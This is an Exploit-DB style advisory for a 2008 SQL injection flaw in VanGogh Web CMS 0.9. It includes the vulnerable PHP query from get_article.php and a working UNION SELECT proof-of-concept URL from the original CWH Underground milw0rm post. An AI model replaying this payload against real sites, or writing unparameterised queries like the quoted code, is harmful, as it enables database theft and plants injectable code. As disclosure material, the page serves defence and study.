VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability

vendor:

VanGogh Web CMS

by:

CWH Underground

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: VanGogh Web CMS

Affected Version From: 0.9

Affected Version To: 0.9

Patch Exists: NO

Related CWE: N/A

CPE: a:vangogh:vangogh_web_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability

VanGogh Web CMS version 0.9 is vulnerable to a remote SQL injection vulnerability. The vulnerability exists in the 'get_article.php' file, specifically in line 339, where user-supplied input is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

===================================================================
  VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability
===================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 1 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : VanGogh Web CMS
 VERSION     : 0.9
 VENDOR      : http://vangogh.holoclan.de/
 DOWNLOAD    : http://downloads.sourceforge.net/vangogh/vangogh_0_9.zip
#####################################################


--- Remote SQL Injection ---

-----------------------------------
 Vulnerable File (get_article.php)
-----------------------------------

@Line

   337:   $sql='SELECT text.content, article.lastchanged, parttypes.tag'
   338:       .' FROM article,T_A,text,parttypes'
   339:       .' WHERE article.ID=T_A.AID AND text.ID=T_A.TID AND parttypes.ID=T_A.parttype AND article.ID='.$article_ID;
   340:
   341:   $result=mysql_query($sql,$db) or die("$sql : Parse template  Query funktioniert ned");

---------
 Exploit
---------

[+] http://[Target]/[vangogh_path]/index.php?article_ID=[SQL Injection]&get_action=article&section=5


------
 POC
------

[+] http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/**/section&get_action=article&section=5


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-07-01]